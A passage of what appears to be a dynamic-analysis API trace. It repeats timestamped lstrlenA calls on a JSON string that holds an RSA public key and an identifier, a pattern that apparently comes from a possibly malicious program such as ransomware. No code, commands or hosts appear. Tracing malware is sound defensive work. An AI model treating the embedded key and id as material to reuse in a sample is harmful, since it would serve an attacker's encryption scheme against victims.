KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0074.146] lstrlenA (lpString="-----BEGIN PUBLIC 